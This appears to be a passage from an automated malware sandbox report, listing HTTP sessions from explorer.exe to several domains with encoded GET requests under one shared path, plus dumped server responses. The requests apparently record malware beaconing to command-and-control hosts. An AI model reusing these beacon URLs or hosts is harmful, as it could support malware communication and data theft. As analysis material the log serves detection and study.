                                                                                          Oct 8, 2021 10:03:06.123753071 CEST5887INHTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-Powered-By-Plesk: PleskWin
                                                                                          Date: Fri, 08 Oct 2021 08:03:05 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 12579
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 3a 34 30 30 20 36 32 2e 35 25 2f 31 2e 34 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 61 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 32 34 39 38 65 33 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 31 38 38 64 64 39 3b 6f 75 74 6c 69 6e 65 3a 30 7d 68 31 2c 68 32 7b 6d 61 72 67 69 6e 3a 30 20 30 20 2e 35 72 65 6d 3b 63 6f 6c 6f 72 3a 23 34 34 34 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 72 65 6d 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 36 72 65 6d 7d 2e 65 72 72 6f 72 2d 63 6f 64 65 7b 63 6f 6c 6f 72 3a 23 66 34 37 37 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 70 7b 6d 61 72 67 69 6e 3a 31 2e 32 72 65 6d 20 30 7d 70 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 72 65 6d 3b 63 6f 6c 6f 72 3a 23 34 66 35 61 36 34 7d 68 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 3a 32 2e 34 72 65 6d 20 30 3b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 7d 2e 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 70 61 67 65 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 27 27 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <style>html{overflow-y:scroll;color:#000;font:400 62.5%/1.4 "Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}body,html{height:100%;min-height:100%}body{margin:0;font-size:1.3rem;background:#fff;color:#000}a{cursor:pointer;text-decoration:none;color:#2498e3;background-color:transparent}a:active,a:hover{text-decoration:underline;color:#188dd9;outline:0}h1,h2{margin:0 0 .5rem;color:#444;font-weight:400;line-height:1}h1{font-size:2.4rem}h2{font-size:3.6rem}.error-code{color:#f47755;font-size:8rem;line-height:1}p{margin:1.2rem 0}p.lead{font-size:1.6rem;color:#4f5a64}hr{box-sizing:content-box;height:0;margin:2.4rem 0;border:0;border-top:1px solid #ddd}.page{display:-webkit-box;display:-ms-flexbox;display:flex;min-height:100vh}.page:before{display:block;content:'';-webkit-box-flex:0
                                                                                          Oct 8, 2021 10:03:06.123790026 CEST5888INData Raw: 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 31 20 34 37 34 70 78 3b 66 6c 65 78 3a 30 20 31 20 34 37 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 38 34 34 34 66 20 35 30 25 20 36 65 6d 20 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                          Data Ascii: ;-ms-flex:0 1 474px;flex:0 1 474px;background:#38444f 50% 6em no-repeat;background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyMjgiIGhlaWdodD0iNjkyIiB2aWV3Qm94PSIwIDAgMjI3LjYgNjkxLjgiPjxw
                                                                                          Oct 8, 2021 10:03:06.123815060 CEST5890INData Raw: 7a 4c 6a 6c 49 4d 54 45 30 4c 6a 64 32 4d 54 4d 75 4f 55 67 79 4d 54 67 75 4f 47 4d 7a 4c 6a 6b 67 4d 43 41 33 4c 54 4d 75 4d 53 41 33 4c 54 59 75 4f 55 4d 79 4d 6a 55 75 4f 43 41 32 4e 7a 63 67 4d 6a 49 79 4c 6a 63 67 4e 6a 63 7a 4c 6a 6b 67 4d
                                                                                          Data Ascii: zLjlIMTE0Ljd2MTMuOUgyMTguOGMzLjkgMCA3LTMuMSA3LTYuOUMyMjUuOCA2NzcgMjIyLjcgNjczLjkgMjE4LjggNjczLjl6IiBmaWxsPSIjQTJBN0FDIi8+PHBhdGggZD0iTTIyMi43IDI4OC45SDYuMWMtMS43IDAtMyAxLjMtMyAzdjRjMC0xLjcgMS4zLTMgMy0zaDIxNi42YzEuNyAwIDMgMS4zIDMgM3YtNEMyMjUuNy
                                                                                          Oct 8, 2021 10:03:06.123836994 CEST5891INData Raw: 6b 30 78 4d 54 51 75 4e 79 41 7a 4f 54 49 75 4d 57 67 78 4d 54 46 32 4e 79 34 30 53 44 45 78 4e 43 34 33 56 6a 4d 35 4d 69 34 78 65 69 49 67 5a 6d 6c 73 62 44 30 69 49 7a 45 30 51 6a 64 46 51 53 49 76 50 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30
                                                                                          Data Ascii: k0xMTQuNyAzOTIuMWgxMTF2Ny40SDExNC43VjM5Mi4xeiIgZmlsbD0iIzE0QjdFQSIvPjxwYXRoIGQ9Ik0zLjEgMzg0LjdoNzYuMXYxNC44SDMuMVYzODQuN3oiIGZpbGw9IiM3MUU5RkYiLz48cGF0aCBkPSJNMy4xIDM2NC4xaDIyMi42djcuNEgzLjFWMzY0LjF6IiBmaWxsPSIjMjA5OUQwIi8+PHBhdGggZD0iTTMuMSAz
                                                                                          Oct 8, 2021 10:03:06.123862982 CEST5893INData Raw: 46 4d 30 59 30 52 6b 59 69 4c 7a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4e 54 67 75 4e 53 41 78 4e 43 34 32 51 7a 63 7a 4c 6a 55 67 4e 43 34 33 49 44 45 78 4e 53 34 32 4c 54 49 75 4e 43 41 78 4d 7a 59 75 4e 43 41 7a 4f 57 4d 78 4e 79 34 30 4c
                                                                                          Data Ascii: FM0Y0RkYiLz48cGF0aCBkPSJNNTguNSAxNC42QzczLjUgNC43IDExNS42LTIuNCAxMzYuNCAzOWMxNy40LTEzLjYgMzUuNC03LjcgNDQtMS4zIDExLjMgOC4zIDE0LjggMTkuMyAxNS4xIDI4LjMgMC40LTkuNC0yLjUtMjItMTUuMS0zMS4zIC04LjYtNi4zLTI2LjYtMTIuMi00NCAxLjRDMTE1LjYtNS40IDczLjUgMS43ID
                                                                                          Oct 8, 2021 10:03:06.123886108 CEST5894INData Raw: 69 34 79 49 44 55 75 4d 79 30 32 4c 6a 45 67 4c 54 41 75 4d 53 30 7a 4c 6a 6b 74 4e 43 30 34 4c 6a 6b 74 4e 53 34 7a 4c 54 45 77 4c 6a 56 32 4c 54 41 75 4d 6d 4d 77 49 44 41 67 4d 43 41 77 4c 6a 45 74 4d 43 34 78 49 44 41 75 4d 53 41 77 49 44 41
                                                                                          Data Ascii: i4yIDUuMy02LjEgLTAuMS0zLjktNC04LjktNS4zLTEwLjV2LTAuMmMwIDAgMCAwLjEtMC4xIDAuMSAwIDAgMC0wLjEtMC4xLTAuMXYwLjJjLTEuMyAxLjYtNS4zIDYuNi01LjMgMTAuNSAtMC4xIDQgMyA2LjEgNS4zIDYuMVYyNDguM3pNMTY5LjggMjEzLjhjMCAwIDAgMC4xLTAuMSAwLjEgMCAwIDAtMC4xLTAuMS0wLjF2
                                                                                          Oct 8, 2021 10:03:06.123907089 CEST5895INData Raw: 77 64 6a 42 6a 4d 69 34 7a 4c 54 41 75 4d 53 41 31 4c 6a 51 74 4d 69 34 79 49 44 55 75 4d 79 30 32 4c 6a 45 67 4c 54 41 75 4d 53 30 7a 4c 6a 6b 74 4e 43 30 34 4c 6a 6b 74 4e 53 34 7a 4c 54 45 77 4c 6a 56 57 4d 6a 55 35 4c 6a 68 36 54 54 45 31 4e
                                                                                          Data Ascii: wdjBjMi4zLTAuMSA1LjQtMi4yIDUuMy02LjEgLTAuMS0zLjktNC04LjktNS4zLTEwLjVWMjU5Ljh6TTE1NC4zIDIwMC43di0wLjFjMCAwIDAgMCAwIDAuMSAwIDAgMCAwIDAtMC4xdjAuMWMtMC45IDEuMi0zLjggNC45LTMuOSA3LjcgLTAuMSAyLjkgMi4yIDQuNSAzLjkgNC41djBjMCAwIDAgMCAwIDBzMCAwIDAgMHYwYz
                                                                                          Oct 8, 2021 10:03:06.123927116 CEST5897INData Raw: 6a 49 74 4d 79 34 34 49 44 51 75 4f 53 30 7a 4c 6a 6b 67 4e 79 34 33 49 43 30 77 4c 6a 45 67 4d 69 34 35 49 44 49 75 4d 69 41 30 4c 6a 55 67 4d 79 34 35 49 44 51 75 4e 58 59 77 59 7a 41 67 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 41
                                                                                          Data Ascii: jItMy44IDQuOS0zLjkgNy43IC0wLjEgMi45IDIuMiA0LjUgMy45IDQuNXYwYzAgMCAwIDAgMCAwIDAgMCAwIDAgMCAwdjBjMS43LTAuMSAzLjktMS42IDMuOC00LjUgLTAuMS0yLjktMi45LTYuNS0zLjgtNy43VjIxNC43ek0xNzQuNSAxODguMmMwIDAgMCAwIDAgMC4xIDAgMCAwIDAgMC0wLjF2MC4xYy0wLjkgMS4yLTMu
                                                                                          Oct 8, 2021 10:03:06.123949051 CEST5898INData Raw: 74 4d 79 34 34 4c 54 63 75 4e 31 59 79 4e 6a 49 75 4e 33 70 4e 4d 54 51 79 4c 6a 4d 67 4d 6a 63 78 4c 6a 56 6a 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 75 4d 53 41 77 49 44 41 67 4d 43 41 77 49 44 41 74 4d 43 34 78 64 6a 41 75 4d 57 4d 74 4d
                                                                                          Data Ascii: tMy44LTcuN1YyNjIuN3pNMTQyLjMgMjcxLjVjMCAwIDAgMCAwIDAuMSAwIDAgMCAwIDAtMC4xdjAuMWMtMC45IDEuMi0zLjggNC45LTMuOSA3LjcgLTAuMSAyLjkgMi4yIDQuNSAzLjkgNC41djBjMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDB2MGMxLjctMC4xIDMuOS0xLjYgMy44LTQuNSAtMC4xLTIuOS0yLjktNi41LTMuOC
                                                                                          Oct 8, 2021 10:03:06.123964071 CEST5899INData Raw: 3a 32 35 30 70 78 3b 66 6c 65 78 2d 62 61 73 69 73 3a 32 35 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 72 65 6d 20 2d 34 2e 38 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 36 36 70 78 20 61 75 74
                                                                                          Data Ascii: :250px;flex-basis:250px;background-position:5rem -4.8rem;background-size:166px auto}.main{min-height:0;-webkit-box-flex:0;-ms-flex:none;flex:none}}@media(max-width:479px){h2{font-size:3rem}.main{padding:3rem}}</style></head><body><div cl


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          16192.168.2.349880155.159.216.3780C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:11.780846119 CEST5900OUTGET /nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB HTTP/1.1
                                                                                          Host: www.qgt114.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          17192.168.2.34988123.227.38.7480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:17.638874054 CEST5901OUTGET /nqn4/?T2MpwT=PjOGATJe62g+EVXM60l0TMrP33Vq4i5cZ7PlVlprXq2FiCzLypjhbH9eK52lYLlj7XZy&CJBlp=0Brh6Vr8UbBX HTTP/1.1
                                                                                          Host: www.8straps.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:03:17.682518959 CEST5902INHTTP/1.1 403 Forbidden
                                                                                          Date: Fri, 08 Oct 2021 08:03:17 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          X-Sorting-Hat-PodId: 155
                                                                                          X-Sorting-Hat-ShopId: 57051775132
                                                                                          X-Request-ID: b9d9a923-e41f-4574-b3bc-b943bca5839f
                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          X-Download-Options: noopen
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Dc: gcp-europe-west1
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 69adda134bf42bc6-FRA
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
                                                                                          Oct 8, 2021 10:03:17.682574034 CEST5903INData Raw: 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72
                                                                                          Data Ascii: umn}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transiti
                                                                                          Oct 8, 2021 10:03:17.682626009 CEST5905INData Raw: 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69
                                                                                          Data Ascii: }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                                                                                          Oct 8, 2021 10:03:17.682662964 CEST5906INData Raw: e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0
                                                                                          Data Ascii: ", "content-title": " " }, "ja": { "title": "
                                                                                          Oct 8, 2021 10:03:17.682692051 CEST5906INData Raw: 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75
                                                                                          Data Ascii: // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage docum
                                                                                          Oct 8, 2021 10:03:17.682718992 CEST5907INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          18192.168.2.3498823.223.115.18580C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:22.831777096 CEST5907OUTGET /nqn4/?T2MpwT=1VzaRmvUXe4pCORdptTlduQET280TPZEdmjA3nEATW/6bXP3pygViu3GMM/9v+eynZ6+&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.cosmetictreat.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:03:22.969273090 CEST5908INHTTP/1.1 302 Found
                                                                                          Cache-Control: private
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Location: https://www.hugedomains.com/domain_profile.cfm?d=cosmetictreat&e=com
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          X-Powered-By: ASP.NET
                                                                                          Date: Fri, 08 Oct 2021 08:02:32 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 189
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 63 6f 73 6d 65 74 69 63 74 72 65 61 74 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=cosmetictreat&amp;e=com">here</a>.</h2></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          19192.168.2.349883199.192.27.3180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:28.215811014 CEST5908OUTGET /nqn4/?T2MpwT=Wjqq3kKWaZessn6+0zor2VbG1MsxXB3N8HOi7pnP0i0lcv2FzdILsKCUGbtokKNHvSaZ&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.brasbux.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:03:28.490439892 CEST5909INHTTP/1.1 404 Not Found
                                                                                          Date: Fri, 08 Oct 2021 08:03:28 GMT
                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                          Content-Length: 277
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 72 61 73 62 75 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.brasbux.com Port 80</address></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.349852183.181.96.7980C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:10.025392056 CEST5780OUTGET /nqn4/?T2MpwT=n9MfkADJlGV/yt7v9R1KFrF+APzpIOm/DYQis6iYSXuIjWSgUnKCQKlQm8ZLyuu4NEBr&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.trust-top.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:10.388566017 CEST5784INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Fri, 08 Oct 2021 08:01:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                          X-Redirect-By: WordPress
